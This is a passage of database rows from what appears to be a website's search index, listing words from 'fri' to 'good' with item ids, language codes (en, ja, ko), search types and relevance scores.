('fri', 163, 'ja', 'node_search', 1),
('fri', 164, 'en', 'node_search', 1),
('fri', 164, 'ja', 'node_search', 1),
('fri', 165, 'en', 'node_search', 1),
('fri', 165, 'ja', 'node_search', 1),
('fri', 166, 'en', 'node_search', 1),
('fri', 166, 'ja', 'node_search', 1),
('fri', 167, 'en', 'node_search', 1),
('fri', 167, 'ja', 'node_search', 1),
('fri', 168, 'en', 'node_search', 1),
('fri', 168, 'ja', 'node_search', 1),
('fri', 169, 'en', 'node_search', 1),
('fri', 169, 'ja', 'node_search', 1),
('fri', 170, 'en', 'node_search', 1),
('fri', 170, 'ja', 'node_search', 1),
('fri', 171, 'en', 'node_search', 1),
('fri', 171, 'ja', 'node_search', 1),
('fri', 173, 'en', 'node_search', 1),
('fri', 173, 'ja', 'node_search', 1),
('fri', 174, 'en', 'node_search', 1),
('fri', 174, 'ja', 'node_search', 1),
('fri', 175, 'en', 'node_search', 1),
('fri', 175, 'ja', 'node_search', 1),
('fri', 176, 'en', 'node_search', 1),
('fri', 176, 'ja', 'node_search', 1),
('fri', 177, 'en', 'node_search', 1),
('fri', 177, 'ja', 'node_search', 1),
('fri', 178, 'en', 'node_search', 1),
('fri', 178, 'ja', 'node_search', 1),
('fri', 179, 'en', 'node_search', 1),
('fri', 179, 'ja', 'node_search', 1),
('fri', 180, 'en', 'node_search', 1),
('fri', 180, 'ja', 'node_search', 1),
('fri', 181, 'en', 'node_search', 2),
('fri', 181, 'ja', 'node_search', 2),
('fri', 182, 'en', 'node_search', 2),
('fri', 182, 'ja', 'node_search', 2),
('fri', 183, 'en', 'node_search', 2),
('fri', 183, 'ja', 'node_search', 2),
('fri', 184, 'en', 'node_search', 1),
('fri', 184, 'ja', 'node_search', 1),
('fri', 185, 'en', 'node_search', 1),
('fri', 185, 'ja', 'node_search', 1),
('fri', 186, 'en', 'node_search', 1),
('fri', 186, 'ja', 'node_search', 1),
('fri', 206, 'ja', 'node_search', 1),
('friday', 31, 'en', 'node_search', 1),
('friday', 142, 'en', 'node_search', 1),
('from', 5, 'en', 'node_search', 1),
('from', 5, 'ko', 'node_search', 1),
('from', 6, 'en', 'help_search', 1),
('from', 6, 'ja', 'help_search', 1),
('from', 6, 'ko', 'help_search', 1),
('from', 7, 'en', 'node_search', 2),
('from', 7, 'ko', 'node_search', 2),
('from', 9, 'en', 'node_search', 56),
('from', 10, 'en', 'help_search', 4),
('from', 10, 'ja', 'help_search', 4),
('from', 10, 'ko', 'help_search', 4),
('from', 14, 'en', 'help_search', 1),
('from', 14, 'ja', 'help_search', 1),
('from', 14, 'ko', 'help_search', 1),
('from', 17, 'en', 'node_search', 58),
('from', 18, 'en', 'node_search', 1),
('from', 18, 'ko', 'node_search', 1),
('from', 19, 'en', 'node_search', 28),
('from', 19, 'ko', 'node_search', 28),
('from', 22, 'en', 'help_search', 0.949597),
('from', 22, 'ja', 'help_search', 0.949597),
('from', 22, 'ko', 'help_search', 0.949597),
('from', 23, 'en', 'help_search', 2),
('from', 23, 'en', 'node_search', 5.57827),
('from', 23, 'ja', 'help_search', 2),
('from', 23, 'ko', 'help_search', 2),
('from', 24, 'en', 'node_search', 2.56222),
('from', 27, 'en', 'node_search', 3.60435),
('from', 28, 'en', 'help_search', 1),
('from', 28, 'ja', 'help_search', 1),
('from', 28, 'ko', 'help_search', 1),
('from', 29, 'en', 'help_search', 2),
('from', 29, 'ja', 'help_search', 2),
('from', 29, 'ko', 'help_search', 2),
('from', 30, 'en', 'help_search', 2.6312),
('from', 30, 'ja', 'help_search', 2.6312),
('from', 30, 'ko', 'help_search', 2.6312),
('from', 31, 'en', 'node_search', 3.90286),
('from', 32, 'en', 'help_search', 5),
('from', 32, 'ja', 'help_search', 5),
('from', 32, 'ko', 'help_search', 5),
('from', 33, 'en', 'help_search', 1),
('from', 33, 'ja', 'help_search', 1),
('from', 33, 'ko', 'help_search', 1),
('from', 37, 'en', 'help_search', 1),
('from', 37, 'ja', 'help_search', 1),
('from', 37, 'ko', 'help_search', 1),
('from', 50, 'en', 'help_search', 4),
('from', 50, 'ja', 'help_search', 4),
('from', 50, 'ko', 'help_search', 4),
('from', 52, 'en', 'help_search', 1),
('from', 52, 'ja', 'help_search', 1),
('from', 52, 'ko', 'help_search', 1),
('from', 56, 'en', 'help_search', 1),
('from', 56, 'ja', 'help_search', 1),
('from', 56, 'ko', 'help_search', 1),
('from', 57, 'en', 'help_search', 1),
('from', 57, 'ja', 'help_search', 1),
('from', 57, 'ko', 'help_search', 1),
('from', 61, 'en', 'help_search', 1),
('from', 61, 'ja', 'help_search', 1),
('from', 61, 'ko', 'help_search', 1),
('from', 62, 'en', 'node_search', 30),
('from', 64, 'en', 'help_search', 1),
('from', 64, 'ja', 'help_search', 1),
('from', 64, 'ko', 'help_search', 1),
('from', 66, 'en', 'node_search', 2),
('from', 67, 'en', 'help_search', 1),
('from', 67, 'ja', 'help_search', 1),
('from', 67, 'ko', 'help_search', 1),
('from', 69, 'en', 'help_search', 1),
('from', 69, 'en', 'node_search', 1),
('from', 69, 'ja', 'help_search', 1),
('from', 69, 'ko', 'help_search', 1),
('from', 74, 'en', 'help_search', 1),
('from', 74, 'ja', 'help_search', 1),
('from', 74, 'ko', 'help_search', 1),
('from', 75, 'en', 'help_search', 1),
('from', 75, 'ja', 'help_search', 1),
('from', 75, 'ko', 'help_search', 1),
('from', 80, 'en', 'help_search', 1),
('from', 80, 'ja', 'help_search', 1),
('from', 80, 'ko', 'help_search', 1),
('from', 84, 'en', 'help_search', 1),
('from', 84, 'ja', 'help_search', 1),
('from', 84, 'ko', 'help_search', 1),
('from', 86, 'en', 'help_search', 1),
('from', 86, 'ja', 'help_search', 1),
('from', 86, 'ko', 'help_search', 1),
('from', 89, 'en', 'help_search', 1),
('from', 89, 'ja', 'help_search', 1),
('from', 89, 'ko', 'help_search', 1),
('from', 93, 'en', 'help_search', 1.75209),
('from', 93, 'ja', 'help_search', 1.75209),
('from', 93, 'ko', 'help_search', 1.75209),
('from', 98, 'en', 'node_search', 1),
('from', 122, 'en', 'node_search', 1),
('from', 126, 'en', 'node_search', 1),
('from', 133, 'en', 'node_search', 1),
('from', 136, 'en', 'node_search', 1),
('from', 138, 'en', 'node_search', 1),
('from', 142, 'en', 'node_search', 1),
('from', 157, 'en', 'node_search', 1),
('from', 179, 'en', 'node_search', 1),
('from', 182, 'en', 'node_search', 28),
('front', 46, 'en', 'help_search', 1),
('front', 46, 'ja', 'help_search', 1),
('front', 46, 'ko', 'help_search', 1),
('front', 56, 'en', 'help_search', 5),
('front', 56, 'ja', 'help_search', 5),
('front', 56, 'ko', 'help_search', 5),
('fukuoka', 79, 'en', 'node_search', 1),
('fukuoka', 80, 'en', 'node_search', 5),
('fukuoka', 80, 'ja', 'node_search', 0.989021),
('fulfillment', 80, 'en', 'node_search', 1),
('full', 24, 'en', 'node_search', 0.738408),
('full', 56, 'en', 'help_search', 2),
('full', 56, 'ja', 'help_search', 2),
('full', 56, 'ko', 'help_search', 2),
('full', 65, 'en', 'help_search', 1),
('full', 65, 'ja', 'help_search', 1),
('full', 65, 'ko', 'help_search', 1),
('full', 73, 'en', 'help_search', 2),
('full', 73, 'ja', 'help_search', 2),
('full', 73, 'ko', 'help_search', 2),
('fullexport', 30, 'en', 'help_search', 0.808176),
('fullexport', 30, 'ja', 'help_search', 0.808176),
('fullexport', 30, 'ko', 'help_search', 0.808176),
('fully', 44, 'en', 'help_search', 1),
('fully', 44, 'ja', 'help_search', 1),
('fully', 44, 'ko', 'help_search', 1),
('fully', 45, 'en', 'help_search', 1),
('fully', 45, 'ja', 'help_search', 1),
('fully', 45, 'ko', 'help_search', 1),
('fully', 67, 'en', 'help_search', 1.89272),
('fully', 67, 'ja', 'help_search', 1.89272),
('fully', 67, 'ko', 'help_search', 1.89272),
('fully', 68, 'en', 'help_search', 0.827757),
('fully', 68, 'ja', 'help_search', 0.827757),
('fully', 68, 'ko', 'help_search', 0.827757),
('function', 32, 'en', 'help_search', 1),
('function', 32, 'ja', 'help_search', 1),
('function', 32, 'ko', 'help_search', 1),
('function', 65, 'en', 'help_search', 1),
('function', 65, 'ja', 'help_search', 1),
('function', 65, 'ko', 'help_search', 1),
('function', 84, 'en', 'help_search', 1),
('function', 84, 'ja', 'help_search', 1),
('function', 84, 'ko', 'help_search', 1),
('functionality', 11, 'en', 'help_search', 2.86054),
('functionality', 11, 'ja', 'help_search', 2.86054),
('functionality', 11, 'ko', 'help_search', 2.86054),
('functionality', 33, 'en', 'help_search', 29),
('functionality', 33, 'ja', 'help_search', 29),
('functionality', 33, 'ko', 'help_search', 29),
('functionality', 35, 'en', 'help_search', 1),
('functionality', 35, 'ja', 'help_search', 1),
('functionality', 35, 'ko', 'help_search', 1),
('functionality', 42, 'en', 'help_search', 1),
('functionality', 42, 'ja', 'help_search', 1),
('functionality', 42, 'ko', 'help_search', 1),
('functionality', 43, 'en', 'help_search', 2.92384),
('functionality', 43, 'ja', 'help_search', 2.92384),
('functionality', 43, 'ko', 'help_search', 2.92384),
('functionality', 62, 'en', 'help_search', 1),
('functionality', 62, 'ja', 'help_search', 1),
('functionality', 62, 'ko', 'help_search', 1),
('functionality', 65, 'en', 'help_search', 1),
('functionality', 65, 'ja', 'help_search', 1),
('functionality', 65, 'ko', 'help_search', 1),
('functionality', 73, 'en', 'help_search', 1),
('functionality', 73, 'ja', 'help_search', 1),
('functionality', 73, 'ko', 'help_search', 1),
('functions', 23, 'en', 'help_search', 1),
('functions', 23, 'ja', 'help_search', 1),
('functions', 23, 'ko', 'help_search', 1),
('further', 25, 'ja', 'help_search', 1),
('further', 26, 'en', 'help_search', 1),
('further', 26, 'ja', 'help_search', 1),
('further', 26, 'ko', 'help_search', 1),
('further', 57, 'en', 'help_search', 1),
('further', 57, 'ja', 'help_search', 1),
('further', 57, 'ko', 'help_search', 1),
('further', 66, 'en', 'node_search', 0.949597),
('further', 155, 'en', 'node_search', 1),
('further', 162, 'en', 'node_search', 0.863659),
('further', 183, 'en', 'node_search', 1),
('further', 194, 'en', 'node_search', 1),
('future', 26, 'en', 'node_search', 28),
('future', 30, 'en', 'help_search', 0.927431),
('future', 30, 'ja', 'help_search', 0.927431),
('future', 30, 'ko', 'help_search', 0.927431),
('future', 45, 'en', 'help_search', 1),
('future', 45, 'ja', 'help_search', 1),
('future', 45, 'ko', 'help_search', 1),
('future', 62, 'en', 'node_search', 0.810915),
('future', 66, 'en', 'node_search', 1),
('future', 155, 'en', 'node_search', 1),
('future', 160, 'en', 'node_search', 1),
('future', 161, 'en', 'node_search', 1),
('future', 166, 'en', 'node_search', 2),
('future', 167, 'en', 'node_search', 1),
('future', 168, 'en', 'node_search', 1),
('future', 169, 'en', 'node_search', 1),
('future', 170, 'en', 'node_search', 1),
('future', 173, 'en', 'node_search', 1),
('future', 174, 'en', 'node_search', 1),
('future', 176, 'en', 'node_search', 1),
('future', 177, 'en', 'node_search', 1),
('future', 179, 'en', 'node_search', 1),
('future', 180, 'en', 'node_search', 1),
('future', 181, 'en', 'node_search', 1),
('future', 182, 'en', 'node_search', 1),
('future', 183, 'en', 'node_search', 2),
('future', 185, 'en', 'node_search', 1),
('future', 186, 'en', 'node_search', 1),
('future', 187, 'en', 'node_search', 27),
('future', 188, 'en', 'node_search', 29),
('future', 190, 'en', 'node_search', 2),
('future', 192, 'en', 'node_search', 2),
('future', 193, 'en', 'node_search', 1),
('future', 194, 'en', 'node_search', 1),
('future', 195, 'en', 'node_search', 1),
('future', 196, 'en', 'node_search', 2),
('future', 197, 'en', 'node_search', 1),
('future', 198, 'en', 'node_search', 2),
('gain', 95, 'en', 'node_search', 1),
('gain', 116, 'en', 'node_search', 1),
('gain', 136, 'en', 'node_search', 2),
('gain', 138, 'en', 'node_search', 1),
('gain', 167, 'en', 'node_search', 1),
('gain', 176, 'en', 'node_search', 1),
('gain', 193, 'en', 'node_search', 1),
('gain', 194, 'en', 'node_search', 1),
('gain', 198, 'en', 'node_search', 1),
('gaishoku', 70, 'en', 'node_search', 1),
('gaishoku', 71, 'en', 'node_search', 1),
('gaishoku', 72, 'en', 'node_search', 1),
('gaishoku', 73, 'en', 'node_search', 1),
('gaishoku', 74, 'en', 'node_search', 1),
('gaishoku', 75, 'en', 'node_search', 1),
('gaishoku', 81, 'en', 'node_search', 4),
('gaishoku', 82, 'en', 'node_search', 1),
('gaishoku', 84, 'en', 'node_search', 1),
('gaishoku', 85, 'en', 'node_search', 4),
('gaishoku', 90, 'en', 'node_search', 1),
('gaishoku', 98, 'en', 'node_search', 1),
('gaishoku', 100, 'en', 'node_search', 4),
('gaishoku', 101, 'en', 'node_search', 1),
('gaishoku', 104, 'en', 'node_search', 1),
('gaishoku', 106, 'en', 'node_search', 1),
('gaishoku', 107, 'en', 'node_search', 1),
('gaishoku', 107, 'ja', 'node_search', 1),
('gaishoku', 109, 'en', 'node_search', 1),
('gaishoku', 109, 'ja', 'node_search', 1),
('gaishoku', 110, 'en', 'node_search', 1),
('gaishoku', 111, 'en', 'node_search', 1),
('gaishoku', 112, 'en', 'node_search', 1),
('gaishoku', 112, 'ja', 'node_search', 1),
('gaishoku', 114, 'en', 'node_search', 1),
('gaishoku', 114, 'ja', 'node_search', 1),
('gaishoku', 117, 'en', 'node_search', 1),
('gaishoku', 117, 'ja', 'node_search', 1),
('gaishoku', 118, 'en', 'node_search', 1),
('gaishoku', 119, 'en', 'node_search', 1),
('gaishoku', 119, 'ja', 'node_search', 1),
('gaishoku', 123, 'en', 'node_search', 1),
('gaishoku', 123, 'ja', 'node_search', 1),
('gaishoku', 124, 'en', 'node_search', 1),
('gaishoku', 125, 'en', 'node_search', 1),
('gaishoku', 125, 'ja', 'node_search', 1),
('gaishoku', 127, 'en', 'node_search', 1),
('gaishoku', 127, 'ja', 'node_search', 1),
('gaishoku', 131, 'en', 'node_search', 1),
('gaishoku', 131, 'ja', 'node_search', 1),
('gaishoku', 133, 'en', 'node_search', 2),
('gaishoku', 134, 'en', 'node_search', 1),
('gaishoku', 138, 'en', 'node_search', 1),
('gaishoku', 142, 'en', 'node_search', 1),
('gaishoku', 143, 'en', 'node_search', 1),
('gaishoku', 143, 'ja', 'node_search', 1),
('gaishoku', 144, 'en', 'node_search', 1),
('gaishoku', 147, 'en', 'node_search', 7),
('gaishoku', 147, 'ja', 'node_search', 7),
('gaishuku', 102, 'en', 'node_search', 1),
('garment', 24, 'en', 'node_search', 0.927431),
('gave', 9, 'en', 'node_search', 3),
('gave', 17, 'en', 'node_search', 4),
('gear', 25, 'ja', 'help_search', 1),
('gear', 26, 'en', 'help_search', 1),
('gear', 26, 'ja', 'help_search', 1),
('gear', 26, 'ko', 'help_search', 1),
('general', 5, 'en', 'node_search', 28),
('general', 5, 'ko', 'node_search', 28),
('general', 27, 'en', 'node_search', 0.771698),
('generally', 59, 'en', 'help_search', 1),
('generally', 59, 'ja', 'help_search', 1),
('generally', 59, 'ko', 'help_search', 1),
('generate', 72, 'en', 'help_search', 2),
('generate', 72, 'ja', 'help_search', 2),
('generate', 72, 'ko', 'help_search', 2),
('generated', 72, 'en', 'help_search', 1),
('generated', 72, 'ja', 'help_search', 1),
('generated', 72, 'ko', 'help_search', 1),
('generated', 76, 'en', 'help_search', 1),
('generated', 76, 'ja', 'help_search', 1),
('generated', 76, 'ko', 'help_search', 1),
('generated', 86, 'en', 'help_search', 1),
('generated', 86, 'ja', 'help_search', 1),
('generated', 86, 'ko', 'help_search', 1),
('generating', 72, 'en', 'help_search', 0.902857),
('generating', 72, 'ja', 'help_search', 0.902857),
('generating', 72, 'ko', 'help_search', 0.902857),
('generation', 23, 'en', 'node_search', 0.866793),
('generic', 11, 'en', 'help_search', 1),
('generic', 11, 'ja', 'help_search', 1),
('generic', 11, 'ko', 'help_search', 1),
('generic', 18, 'en', 'help_search', 1),
('generic', 18, 'ja', 'help_search', 1),
('generic', 18, 'ko', 'help_search', 1),
('genuine', 188, 'en', 'node_search', 1),
('get', 3, 'en', 'node_search', 1),
('get', 3, 'ko', 'node_search', 1),
('get', 5, 'en', 'node_search', 1),
('get', 5, 'ko', 'node_search', 1),
('get', 6, 'en', 'node_search', 28),
('get', 23, 'en', 'help_search', 4),
('get', 23, 'ja', 'help_search', 4),
('get', 23, 'ko', 'help_search', 4),
('get', 24, 'en', 'node_search', 1),
('get', 43, 'en', 'help_search', 0.886095),
('get', 43, 'ja', 'help_search', 0.886095),
('get', 43, 'ko', 'help_search', 0.886095),
('get', 87, 'en', 'node_search', 4),
('gets', 50, 'en', 'help_search', 1),
('gets', 50, 'ja', 'help_search', 1),
('gets', 50, 'ko', 'help_search', 1),
('getting', 83, 'en', 'node_search', 28),
('getting', 83, 'ja', 'node_search', 27),
('getting', 86, 'en', 'node_search', 29),
('getting', 86, 'ja', 'node_search', 28),
('getting', 88, 'en', 'node_search', 29),
('getting', 88, 'ja', 'node_search', 28),
('getting', 89, 'en', 'node_search', 29),
('getting', 89, 'ja', 'node_search', 28),
('getting', 91, 'en', 'node_search', 29),
('getting', 91, 'ja', 'node_search', 28),
('getting', 92, 'en', 'node_search', 29),
('getting', 92, 'ja', 'node_search', 28),
('getting', 93, 'en', 'node_search', 29),
('getting', 93, 'ja', 'node_search', 28),
('getting', 94, 'en', 'node_search', 29),
('getting', 96, 'en', 'node_search', 29),
('getting', 96, 'ja', 'node_search', 28),
('getting', 97, 'en', 'node_search', 29),
('getting', 97, 'ja', 'node_search', 28),
('getting', 98, 'en', 'node_search', 1),
('getting', 99, 'en', 'node_search', 29),
('getting', 99, 'ja', 'node_search', 28),
('getting', 103, 'en', 'node_search', 29),
('getting', 103, 'ja', 'node_search', 29),
('getting', 105, 'en', 'node_search', 29),
('getting', 105, 'ja', 'node_search', 28),
('getting', 108, 'en', 'node_search', 29),
('getting', 108, 'ja', 'node_search', 28),
('getting', 145, 'en', 'node_search', 47),
('getting', 145, 'ja', 'node_search', 27),
('getting', 147, 'en', 'node_search', 34),
('getting', 147, 'ja', 'node_search', 27),
('getting', 148, 'en', 'node_search', 28),
('getting', 148, 'ja', 'node_search', 27),
('getting', 151, 'en', 'node_search', 47),
('getting', 151, 'ja', 'node_search', 27),
('getting', 152, 'en', 'node_search', 27),
('getting', 152, 'ja', 'node_search', 27),
('getting', 153, 'en', 'node_search', 47),
('getting', 153, 'ja', 'node_search', 27),
('ginou', 24, 'en', 'node_search', 1),
('ginou', 24, 'ko', 'node_search', 1),
('ginou', 155, 'en', 'node_search', 1),
('ginou', 156, 'en', 'node_search', 1),
('ginou', 157, 'en', 'node_search', 1),
('ginou', 160, 'en', 'node_search', 1),
('ginou', 161, 'en', 'node_search', 1),
('ginou', 162, 'en', 'node_search', 1.92384),
('ginou', 179, 'en', 'node_search', 1),
('give', 22, 'en', 'help_search', 1),
('give', 22, 'ja', 'help_search', 1),
('give', 22, 'ko', 'help_search', 1),
('give', 24, 'en', 'node_search', 0.779231),
('give', 63, 'en', 'help_search', 1),
('give', 63, 'ja', 'help_search', 1),
('give', 63, 'ko', 'help_search', 1),
('give', 68, 'en', 'help_search', 0.802752),
('give', 68, 'ja', 'help_search', 0.802752),
('give', 68, 'ko', 'help_search', 0.802752),
('give', 85, 'en', 'help_search', 4),
('give', 85, 'ja', 'help_search', 4),
('give', 85, 'ko', 'help_search', 4),
('given', 3, 'en', 'node_search', 1),
('given', 3, 'ko', 'node_search', 1),
('given', 7, 'en', 'node_search', 2),
('given', 7, 'ko', 'node_search', 2),
('given', 31, 'ja', 'help_search', 0.98493),
('given', 162, 'en', 'node_search', 0.886095),
('gmailcom', 11, 'en', 'node_search', 11),
('gmailcom', 11, 'ja', 'node_search', 11),
('gmailcom', 11, 'ko', 'node_search', 11),
('gmailcom', 62, 'en', 'node_search', 8.51611),
('gmailcom', 62, 'ja', 'node_search', 0.466323),
('goal', 1, 'en', 'help_search', 19),
('goal', 1, 'ja', 'help_search', 19),
('goal', 1, 'ko', 'help_search', 19),
('goal', 3, 'en', 'help_search', 19),
('goal', 3, 'ja', 'help_search', 19),
('goal', 3, 'ko', 'help_search', 19),
('goal', 4, 'en', 'help_search', 19),
('goal', 4, 'ja', 'help_search', 19),
('goal', 4, 'ko', 'help_search', 19),
('goal', 5, 'en', 'help_search', 19),
('goal', 5, 'ja', 'help_search', 19),
('goal', 5, 'ko', 'help_search', 19),
('goal', 7, 'en', 'help_search', 19),
('goal', 7, 'ja', 'help_search', 19),
('goal', 7, 'ko', 'help_search', 19),
('goal', 8, 'en', 'help_search', 19),
('goal', 8, 'ja', 'help_search', 19),
('goal', 8, 'ko', 'help_search', 19),
('goal', 9, 'en', 'help_search', 19),
('goal', 9, 'ja', 'help_search', 19),
('goal', 9, 'ko', 'help_search', 19),
('goal', 10, 'en', 'help_search', 19),
('goal', 10, 'ja', 'help_search', 19),
('goal', 10, 'ko', 'help_search', 19),
('goal', 12, 'en', 'help_search', 19),
('goal', 12, 'ja', 'help_search', 19),
('goal', 12, 'ko', 'help_search', 19),
('goal', 13, 'en', 'help_search', 19),
('goal', 13, 'ja', 'help_search', 19),
('goal', 13, 'ko', 'help_search', 19),
('goal', 14, 'en', 'help_search', 19),
('goal', 14, 'ja', 'help_search', 19),
('goal', 14, 'ko', 'help_search', 19),
('goal', 15, 'en', 'help_search', 19),
('goal', 15, 'ja', 'help_search', 19),
('goal', 15, 'ko', 'help_search', 19),
('goal', 16, 'en', 'help_search', 19),
('goal', 16, 'ja', 'help_search', 19),
('goal', 16, 'ko', 'help_search', 19),
('goal', 17, 'en', 'help_search', 19),
('goal', 17, 'ja', 'help_search', 19),
('goal', 17, 'ko', 'help_search', 19),
('goal', 18, 'en', 'help_search', 19),
('goal', 18, 'ja', 'help_search', 19),
('goal', 18, 'ko', 'help_search', 19),
('goal', 19, 'en', 'help_search', 19),
('goal', 19, 'ja', 'help_search', 19),
('goal', 19, 'ko', 'help_search', 19),
('goal', 21, 'en', 'help_search', 19),
('goal', 21, 'ja', 'help_search', 19),
('goal', 21, 'ko', 'help_search', 19),
('goal', 22, 'en', 'help_search', 19),
('goal', 22, 'ja', 'help_search', 19),
('goal', 22, 'ko', 'help_search', 19),
('goal', 23, 'en', 'help_search', 19),
('goal', 23, 'ja', 'help_search', 19),
('goal', 23, 'ko', 'help_search', 19),
('goal', 24, 'en', 'help_search', 19),
('goal', 24, 'ja', 'help_search', 19),
('goal', 24, 'ko', 'help_search', 19),
('goal', 25, 'en', 'help_search', 19),
('goal', 25, 'ja', 'help_search', 19),
('goal', 26, 'en', 'help_search', 19),
('goal', 26, 'en', 'node_search', 27),
('goal', 26, 'ja', 'help_search', 19),
('goal', 26, 'ko', 'help_search', 19),
('goal', 27, 'en', 'help_search', 19),
('goal', 27, 'ja', 'help_search', 19),
('goal', 27, 'ko', 'help_search', 19),
('goal', 28, 'en', 'help_search', 19),
('goal', 28, 'ja', 'help_search', 19),
('goal', 28, 'ko', 'help_search', 19),
('goal', 32, 'en', 'help_search', 19),
('goal', 32, 'ja', 'help_search', 19),
('goal', 32, 'ko', 'help_search', 19),
('goal', 39, 'en', 'help_search', 19),
('goal', 39, 'ja', 'help_search', 19),
('goal', 39, 'ko', 'help_search', 19),
('goal', 45, 'en', 'help_search', 19),
('goal', 45, 'ja', 'help_search', 19),
('goal', 45, 'ko', 'help_search', 19),
('goal', 48, 'en', 'help_search', 19),
('goal', 48, 'ja', 'help_search', 19),
('goal', 48, 'ko', 'help_search', 19),
('goal', 49, 'en', 'help_search', 19),
('goal', 49, 'ja', 'help_search', 19),
('goal', 49, 'ko', 'help_search', 19),
('goal', 50, 'en', 'help_search', 19),
('goal', 50, 'ja', 'help_search', 19),
('goal', 50, 'ko', 'help_search', 19),
('goal', 51, 'en', 'help_search', 19),
('goal', 51, 'ja', 'help_search', 19),
('goal', 51, 'ko', 'help_search', 19),
('goal', 52, 'en', 'help_search', 19),
('goal', 52, 'ja', 'help_search', 19),
('goal', 52, 'ko', 'help_search', 19),
('goal', 53, 'en', 'help_search', 19),
('goal', 53, 'ja', 'help_search', 19),
('goal', 53, 'ko', 'help_search', 19),
('goal', 54, 'en', 'help_search', 19),
('goal', 54, 'ja', 'help_search', 19),
('goal', 54, 'ko', 'help_search', 19),
('goal', 55, 'en', 'help_search', 19),
('goal', 55, 'ja', 'help_search', 19),
('goal', 55, 'ko', 'help_search', 19),
('goal', 56, 'en', 'help_search', 19),
('goal', 56, 'ja', 'help_search', 19),
('goal', 56, 'ko', 'help_search', 19),
('goal', 57, 'en', 'help_search', 19),
('goal', 57, 'ja', 'help_search', 19),
('goal', 57, 'ko', 'help_search', 19),
('goal', 58, 'en', 'help_search', 19),
('goal', 58, 'ja', 'help_search', 19),
('goal', 58, 'ko', 'help_search', 19),
('goal', 59, 'en', 'help_search', 19),
('goal', 59, 'ja', 'help_search', 19),
('goal', 59, 'ko', 'help_search', 19),
('goal', 60, 'en', 'help_search', 19),
('goal', 60, 'ja', 'help_search', 19),
('goal', 60, 'ko', 'help_search', 19),
('goal', 61, 'en', 'help_search', 19),
('goal', 61, 'ja', 'help_search', 19),
('goal', 61, 'ko', 'help_search', 19),
('goal', 63, 'en', 'help_search', 19),
('goal', 63, 'ja', 'help_search', 19),
('goal', 63, 'ko', 'help_search', 19),
('goal', 64, 'en', 'help_search', 19),
('goal', 64, 'ja', 'help_search', 19),
('goal', 64, 'ko', 'help_search', 19),
('goal', 66, 'en', 'help_search', 19),
('goal', 66, 'ja', 'help_search', 19),
('goal', 67, 'en', 'help_search', 19),
('goal', 67, 'ja', 'help_search', 19),
('goal', 67, 'ko', 'help_search', 19),
('goal', 69, 'en', 'help_search', 19),
('goal', 69, 'ja', 'help_search', 19),
('goal', 69, 'ko', 'help_search', 19),
('goal', 70, 'en', 'help_search', 19),
('goal', 70, 'ja', 'help_search', 19),
('goal', 70, 'ko', 'help_search', 19),
('goal', 71, 'en', 'help_search', 19),
('goal', 71, 'ja', 'help_search', 19),
('goal', 71, 'ko', 'help_search', 19),
('goal', 72, 'en', 'help_search', 19),
('goal', 72, 'ja', 'help_search', 19),
('goal', 72, 'ko', 'help_search', 19),
('goal', 73, 'en', 'help_search', 19),
('goal', 73, 'ja', 'help_search', 19),
('goal', 73, 'ko', 'help_search', 19),
('goal', 74, 'en', 'help_search', 19),
('goal', 74, 'ja', 'help_search', 19),
('goal', 74, 'ko', 'help_search', 19),
('goal', 75, 'en', 'help_search', 19),
('goal', 75, 'ja', 'help_search', 19),
('goal', 75, 'ko', 'help_search', 19),
('goal', 76, 'en', 'help_search', 19),
('goal', 76, 'ja', 'help_search', 19),
('goal', 76, 'ko', 'help_search', 19),
('goal', 77, 'en', 'help_search', 19),
('goal', 77, 'ja', 'help_search', 19),
('goal', 77, 'ko', 'help_search', 19),
('goal', 78, 'en', 'help_search', 19),
('goal', 78, 'ja', 'help_search', 19),
('goal', 78, 'ko', 'help_search', 19),
('goal', 79, 'en', 'help_search', 19),
('goal', 79, 'ja', 'help_search', 19),
('goal', 79, 'ko', 'help_search', 19),
('goal', 81, 'en', 'help_search', 19),
('goal', 81, 'ja', 'help_search', 19),
('goal', 81, 'ko', 'help_search', 19),
('goal', 82, 'en', 'help_search', 19),
('goal', 82, 'ja', 'help_search', 19),
('goal', 82, 'ko', 'help_search', 19),
('goal', 83, 'en', 'help_search', 19),
('goal', 83, 'ja', 'help_search', 19),
('goal', 83, 'ko', 'help_search', 19),
('goal', 85, 'en', 'help_search', 19),
('goal', 85, 'ja', 'help_search', 19),
('goal', 85, 'ko', 'help_search', 19),
('goal', 86, 'en', 'help_search', 19),
('goal', 86, 'ja', 'help_search', 19),
('goal', 86, 'ko', 'help_search', 19),
('goal', 87, 'en', 'help_search', 19),
('goal', 87, 'ja', 'help_search', 19),
('goal', 87, 'ko', 'help_search', 19),
('goal', 88, 'en', 'help_search', 19),
('goal', 88, 'ja', 'help_search', 19),
('goal', 88, 'ko', 'help_search', 19),
('goal', 89, 'en', 'help_search', 19),
('goal', 89, 'ja', 'help_search', 19),
('goal', 89, 'ko', 'help_search', 19),
('goal', 90, 'en', 'help_search', 19),
('goal', 90, 'ja', 'help_search', 19),
('goal', 90, 'ko', 'help_search', 19),
('goal', 91, 'en', 'help_search', 19),
('goal', 91, 'ja', 'help_search', 19),
('goal', 91, 'ko', 'help_search', 19),
('goal', 92, 'en', 'help_search', 19),
('goal', 92, 'ja', 'help_search', 19),
('goal', 92, 'ko', 'help_search', 19),
('goal', 160, 'en', 'node_search', 1),
('goal', 196, 'en', 'node_search', 1),
('goals', 1, 'en', 'node_search', 1),
('goals', 154, 'en', 'node_search', 1),
('goals', 164, 'en', 'node_search', 1),
('goals', 165, 'en', 'node_search', 1),
('goals', 167, 'en', 'node_search', 1),
('goals', 171, 'en', 'node_search', 1),
('goals', 173, 'en', 'node_search', 1),
('goals', 175, 'en', 'node_search', 1),
('goals', 176, 'en', 'node_search', 1),
('goals', 177, 'en', 'node_search', 1),
('goals', 178, 'en', 'node_search', 1),
('goals', 182, 'en', 'node_search', 1),
('goals', 193, 'en', 'node_search', 1),
('goals', 194, 'en', 'node_search', 1),
('goals', 198, 'en', 'node_search', 1),
('goes', 66, 'en', 'node_search', 0.957226),
('goes', 70, 'en', 'help_search', 1),
('goes', 70, 'ja', 'help_search', 1),
('goes', 70, 'ko', 'help_search', 1),
('goes', 93, 'en', 'help_search', 1),
('goes', 93, 'ja', 'help_search', 1),
('goes', 93, 'ko', 'help_search', 1),
('going', 87, 'en', 'node_search', 1),
('golden', 62, 'en', 'node_search', 0.848323),
('good', 18, 'en', 'node_search', 1),
('good', 18, 'ko', 'node_search', 1),
('good', 30, 'en', 'node_search', 2),
('good', 69, 'en', 'node_search', 1),
('good', 70, 'en', 'help_search', 1),
('good', 70, 'ja', 'help_search', 1),
